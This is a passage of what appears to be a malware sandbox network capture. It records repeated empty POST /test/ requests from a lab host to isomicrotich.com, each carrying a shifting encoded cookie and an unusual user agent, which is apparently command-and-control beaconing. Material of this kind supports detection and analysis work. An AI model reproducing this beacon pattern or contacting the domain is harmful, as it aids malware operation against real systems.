                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:06 UTC546INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:06 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yxstfeRaiG7kP4ifBrSvJj6H55h8vyJ9XYyuNkzd634zNu6P1tbk41GgRTxZmTTmr39s6z5hiqd26WO9tmWUFJB9l%2FcRMW%2BX%2BLMy%2FC%2BLOqDqUkSl5qDl6CbhThmGrAMHZRB3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1abd7cc7436a-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                81192.168.2.762399188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:48:06 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:07 UTC546INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:07 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ilS9PTbp4O%2B4Hfe%2Bp1xxaHOlYjqdU6T2NpWcGrHcBE5%2FOGJreMbtYy4DG%2BDG33h7IRJt3D4mD7ksbr9LkWfpUdYESpWTCNeRStHDYuglzCZjPUzqoOmMpx8J0ftyu9iD%2FY6A"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1ac38fb9c443-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                82192.168.2.762401188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:48:08 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:08 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:08 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B1RBs%2BrVGUwoWOvDmkZjWY%2Fc9Khq%2BsLjrf3fZzygn8GC%2F6M5hEOi0bZphUdJqfz9bKs24ucE0AG0NSnX%2Bhe0agA4WhKuNRCcCNJ2np9Txt4sxPuW4DzejRWEtcPA4TRmsotL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1aca79ef41c1-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                83192.168.2.762402188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:48:09 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:09 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:09 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UBX%2F5RZ24la0Ed6UA385Xjx7itVPrujtGZuIeCOZNDE4ADi8MeMkDiQnyfXHXC44vBg6TUnWvtYvkS04oTszrod33ovHdcgDKwx46%2BNjgQfNQO9SgZvBSh3xYYfTNSN8fubc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1ad14b1403d5-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                84192.168.2.762404188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:48:10 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:10 UTC561INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:10 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nzd3UOe1QAGxai9LT3T1c5AjLkAkVMyQABZvE2w2AdBbZInrAEDJfLZgmSwOcuyZ0dHoov6t9TcvoBAn4YVm98m6Xr8AuTKFgBDOrkxA3hMFqQavtDDjMHLs%2Fctupsqw6iPC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1ad7c9620fa3-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                85192.168.2.762407188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:48:11 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:11 UTC565INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:11 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BWN0vIVbScDfYW9idkl9R6JTMHEqrKy%2B1BOoQWgjWP4LNZGCl8gPuPnUFP2UJXAtOMjUOdFdBRiI%2BD%2FKyx7mcLqJN6r8mZKMdnwAp4kLaCXn1lpImwYHhmb6vsBb87BwluSo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1ae06fc57c81-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                86192.168.2.762408188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:48:12 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:12 UTC567INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:12 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bMkf9gVNz4hJ%2BpXdPxyp9zO9lJlhkkMyxltivPVT6TloflDK%2BOp%2FpiJfCWnF7VOLwH3P64Fhq5hL0emjHKDCy4CW4qvMGMs0qINnh4Mw0O8BHMAosJVrP%2BwMuCbmRnHpn4FY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1ae6cba643af-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                87192.168.2.762409188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:48:14 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:14 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:14 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BR0EmrGCKg0nklEhxMXu7eQ%2B3hGBGozzJdTaKecg%2FwlUVOeQTkdwd7a5Aj13O57nlnOuryUWnr0LIZLULQB4AXinT7ehzzNCEcGeUJT5ebS7z9lgyPBHJBKLCp3v3pMW0dRw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1af0ea3e4244-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                88192.168.2.762410188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:48:15 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:15 UTC571INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:15 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C%2BKMIlVCUgLJ7kNUktpNH95xuy%2Bsy32Z7%2BCmLZFVNhTJquL7IKEko30IB6IR9oVAjvAqXJDSk8vYBUrmO6NlMMEIceG%2BBRN0w8mO9gEUA31cDfzkr4%2F9HVNXo3QjMf%2FcXfXv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1af77bad43fd-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                89192.168.2.762412188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:48:16 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFp6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:16 UTC548INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:16 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eitZUq9c3a7UUES8HjJztmxJ2%2BBm1i3DaB9s8uh44hv7xBIk%2BxTjb5qLwHTaovHrft3mTg6U%2Fr7ctH0kfShZ1Smosz%2B3E0FMBb6myAkYee1lVX7VlkcoC7slz%2BrX%2Bqiy4TxD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1afe490bc347-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                90192.168.2.762414188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:48:17 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFo4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:17 UTC546INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:17 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jIQePy%2BRuNmnLf9URNvjeG6TT4lWfV3lPI%2B3Gf2WV%2FXmBjVdbUo7lOhhmDQ25Q5U46F70ulKv17ecagbcmPle7Cx%2FIFjtno2Mv5FevATrcHBBwci5RcqO1w5lwwSwqWvC%2BoD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1b04da250f8c-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                91192.168.2.762416188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:48:18 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFo4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:18 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:18 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mJ5vc%2FljcMmZRsVqo0%2Bzl6f7Kgio2XLjKdNXVlMQWqmtiG7H6SBiDV%2Bhb5AVz2E2NZ9bzBmsuAwetDP%2F27E2Ux1GLHBhgcgWIF91au%2B5ci7ukaOaoqB9Qu8zEgAnCZBbb7Yh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1b0b2f05de95-EWR
                                                                                                                                                                                                                                                2024-10-03 18:48:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                92192.168.2.762417188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:48:20 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFo4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:48:20 UTC565INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:48:20 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CwNC1wn%2B78it%2FAuhDJaTnub2WjTpWH1NmjKkOrpZKXPCosksThdql6stsgTxLFrf1xqw6slsbzdtP5D9hqAzz1z7nM9Rs6Sefgg3NVrlcQZ0mYRi2koD41teTKLzni%2B5nE9r"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1b184dc38c18-EWR
